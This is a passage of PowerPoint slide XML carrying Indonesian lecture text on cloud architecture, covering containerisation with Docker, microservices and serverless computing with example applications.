              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Red Hat Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>variabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>virtualisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Docker (docker.com). Kontainerisasi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainerisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mikro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. Kontainerisasi juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184175664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Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalokasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendekatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> chatbot yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>percakapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjualan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real time </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembacaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
